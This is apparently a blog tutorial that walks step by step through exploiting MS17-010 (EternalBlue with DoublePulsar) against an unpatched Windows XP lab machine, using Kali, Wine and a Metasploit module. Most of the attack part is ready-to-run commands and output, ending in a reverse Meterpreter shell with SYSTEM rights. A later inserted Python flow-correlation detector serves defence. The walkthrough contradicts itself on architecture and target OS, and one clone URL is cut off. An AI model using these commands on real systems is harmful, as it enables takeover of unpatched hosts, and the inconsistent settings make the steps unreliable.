I am back with an article on how to put into practice an exploit that has claimed so many victims. I am writing it simply to raise system administrators' awareness of the importance of keeping their systems up to date.
The idea that a system does not need to be updated because it is not reachable from outside is absolutely false. In fact, attacking a PC that is browsing the internet and turning it into a Trojan horse to compromise internal systems is now a well-established practice (see my article about the pivot attack). The consequences are severe: think of the infamous WannaCry malware, which simply used the MS17-010 vulnerability to attack every vulnerable system it found by scanning the surrounding network.
For these reasons I will focus on how to exploit MS17-010 to compromise an unpatched Windows XP Service Pack 2 system using Kali and Metasploit.
A bit of history for better understanding.
Earlier this year the Shadow Brokers published a large amount of material stolen from the NSA arsenal (git repository https://github.com/misterch0c/shadowbroker), containing tools and exploits for Windows. One of these exploits, called EternalBlue and fixed by the MS17-010 Windows bulletin, allows taking remote control of any unpatched Windows system by means of the FUZZBUNCH and DoublePulsar NSA tools (Windows tools).
EternalBlue is the exploit used in this lab to compromise a Windows XP system. The Windows tools will run on Kali through Wine, which runs Windows binaries on Linux. Their execution will be transparent thanks to the Metasploit exploit module released by ElevenPaths.
This is the lab I created in VirtualBox to simulate the attack:
Before starting the attack, I will describe all the steps needed to prepare Kali and Metasploit.
Kali and Metasploit environment configuration
The FUZZBUNCH and DoublePulsar NSA tools use 32-bit Windows libraries, so running them on Kali requires enabling multiarch. This is done with these commands:
[root@kali contentstore]# dpkg --add-architecture i386 && apt-get update && apt-get install wine32
With wine32 in place, it is now possible to run the FUZZBUNCH framework, which is written in Python 2.6 and requires PyWin32 v2.12.
The next step is to clone the git project created by ElevenPaths, which provides the Ruby exploit code together with all the Windows binaries and DLLs of Fuzzbunch and DoublePulsar.
[root@kali contentstore]# cd /root
[root@kali root]# git clone https://github.com/ElevenPaths/
The next step is to copy the Ruby module into the right directory of the Metasploit framework:
[root@kali contentstore]# cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
Fuzzbunch is an exploitation tool like the Metasploit framework. It exploits the SMB vulnerability described in MS17-010 and installs a backdoor SMB pipe, which DoublePulsar then uses for DLL injection.
Let's take a look at eternalblue_doublepulsar.rb: you can see that DoublePulsar is run after Fuzzbunch has exploited the target successfully.
[root@kali Eternalblue-Doublepulsar-Metasploit]# more eternalblue_doublepulsar.rb | grep wine
OptString.new('WINEPATH', [true, 'WINE drive_c path', '/root/.wine/drive_c/']),
output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
The Kali environment is now ready for the attack. Let's see it next.
Eternalblue_Doublepulsar Exploit
The first step is to run msfconsole and check whether the remote system is vulnerable to MS17-010.
[root@kali root]# msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.4
RHOSTS => 192.168.1.4
msf auxiliary(smb_ms17_010) > run
[+] 192.168.1.4:445 - Host is likely VULNERABLE to MS17-010! (Windows 5.1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The victim is vulnerable, so it is now possible to configure the eternalblue_doublepulsar exploit.
msf > search eternalblue
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/eternalblue_doublepulsar normal EternalBlue
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
-- ----
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) >
Let me explain the meaning of the most important parameters:
- TARGETARCHITECTURE: this is the architecture of the victim. In my case it’s 64 bit. I will set this to x64.
- PROCESSINJECT: this is the process into which the DLL generated by DoublePulsar will be injected. I will set it to explorer.exe.
- RHOST: this is the victim's IP address.
- target: this is the target OS. In my case Windows XP.
This exploit automatically starts a listening TCP handler, and the injected DLL carries a reverse Meterpreter payload that connects back to the Kali system. For a better understanding of how a Meterpreter session works, read this article: https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/.
Here is how to configure the exploit:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
PROCESSINJECT => explorer.exe
msf exploit(eternalblue_doublepulsar) > set TARGET x86
TARGET => x86
msf exploit(eternalblue_doublepulsar) > set target XP
target => XP
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.1.4 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
msf exploit(eternalblue_doublepulsar) >
Let's now run the exploit:
msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] 192.168.1.4:445 – Generating Eternalblue XML data
[*] 192.168.1.4:445 – Generating Doublepulsar XML data
[*] 192.168.1.4:445 – Generating payload DLL for Doublepulsar
[*] 192.168.1.4:445 – Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.4:445 – Launching Eternalblue…
[+] 192.168.1.4:445 – Backdoor is already installed
[*] 192.168.1.4:445 – Launching Doublepulsar…
[*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:1460) at 2017-10-22 01:11:34 +0200
[+] 192.168.1.4:445 – Remote code executed… 3… 2… 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Well done. The attack was easily performed.
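The session above also shows the footprint this kind of attack leaves on the wire, and it is the same footprint a defender can look for: the attacker first connects to the victim on TCP 445, and a few seconds later the victim opens a brand new connection back to the attacker on a port that has nothing to do with file sharing (here 192.168.1.4:1460 -> 192.168.1.3:4444, the reverse handler described under the exploit parameters). The following Python is an added illustration, not code from this article, from Metasploit or from the ElevenPaths module: it correlates inbound SMB connections with a prompt outbound callback from the same host to the same peer on a non-SMB port. The flow-record format, the sample records and the 60-second window are constructed assumptions, not real logs.

```python
# Correlate an inbound SMB connection with a prompt outbound callback from
# the same host to the same peer (attacker -> victim:445, then
# victim -> attacker:<other port> shortly after).  Added illustration; not
# code from the article or from Metasploit.  The record format, the sample
# records and the 60-second window are constructed assumptions.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


# Constructed sample flow records (not real logs), one per line:
# "<ISO-8601 timestamp> <src>:<sport> -> <dst>:<dport>"
# Records 1 and 3 mirror the session in the article: 192.168.1.3 reaches
# 192.168.1.4:445 and 14 s later 192.168.1.4:1460 connects back to
# 192.168.1.3:4444.  Records 2 and 4 are two hosts sharing files with each
# other (SMB in both directions).  Record 5 is an SMB connection with no
# callback at all.
SAMPLE_FLOWS = """\
2017-10-22T01:11:20 192.168.1.3:49812 -> 192.168.1.4:445
2017-10-22T01:11:22 192.168.1.10:51002 -> 192.168.1.4:445
2017-10-22T01:11:34 192.168.1.4:1460 -> 192.168.1.3:4444
2017-10-22T01:12:05 192.168.1.4:1461 -> 192.168.1.10:445
2017-10-22T01:15:00 192.168.1.20:52000 -> 192.168.1.4:445
"""


def parse_flows(text: str) -> List[Flow]:
    """Parse the constructed record format into Flow objects."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, arrow, dst = line.split()
        if arrow != "->":
            raise ValueError(f"unexpected record: {line!r}")
        s_ip, s_port = src.rsplit(":", 1)
        d_ip, d_port = dst.rsplit(":", 1)
        flows.append(Flow(datetime.fromisoformat(ts), s_ip, int(s_port),
                          d_ip, int(d_port)))
    return flows


def find_smb_callbacks(flows: List[Flow], window: timedelta = timedelta(seconds=60),
                       smb_port: int = 445) -> List[Tuple[Flow, Flow]]:
    """Return (inbound_smb, callback) pairs where A -> B:445 is followed
    within `window` by B -> A on any port other than SMB itself.  A later
    B -> A:445 is ordinary two-way file sharing and is not flagged."""
    flows = sorted(flows, key=lambda f: f.ts)
    alerts = []
    for i, smb in enumerate(flows):
        if smb.dport != smb_port:
            continue
        for later in flows[i + 1:]:
            if later.ts - smb.ts > window:
                break  # time-ordered: nothing further can fall in the window
            if (later.src == smb.dst and later.dst == smb.src
                    and later.dport != smb_port):
                alerts.append((smb, later))
    return alerts


def summarize(alerts: List[Tuple[Flow, Flow]]) -> List[Tuple[str, str, int, int]]:
    """(victim, peer, callback_port, seconds_between) for each alert."""
    return [(smb.dst, smb.src, cb.dport, int((cb.ts - smb.ts).total_seconds()))
            for smb, cb in alerts]


if __name__ == "__main__":
    for victim, peer, port, secs in summarize(find_smb_callbacks(parse_flows(SAMPLE_FLOWS))):
        print(f"{victim} received SMB from {peer} and called back to "
              f"{peer}:{port} after {secs}s")
```

On the constructed records only the pair that mirrors the article's session is reported; the host that answers an SMB connection with its own SMB connection is not, because the callback filter excludes port 445. In a real deployment the window and the set of excluded ports would be tuned to the environment, and the flow source would be a firewall, NetFlow or Zeek connection log rather than an inline string.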
Conclusions
I repeat that my goal was to show system administrators how simple it is to exploit an unpatched system.
It is better to be aware of the risks we face if we do not patch our systems, and this is the spirit of this article. Share knowledge to be safer.
Let me know about any issues or suggestions.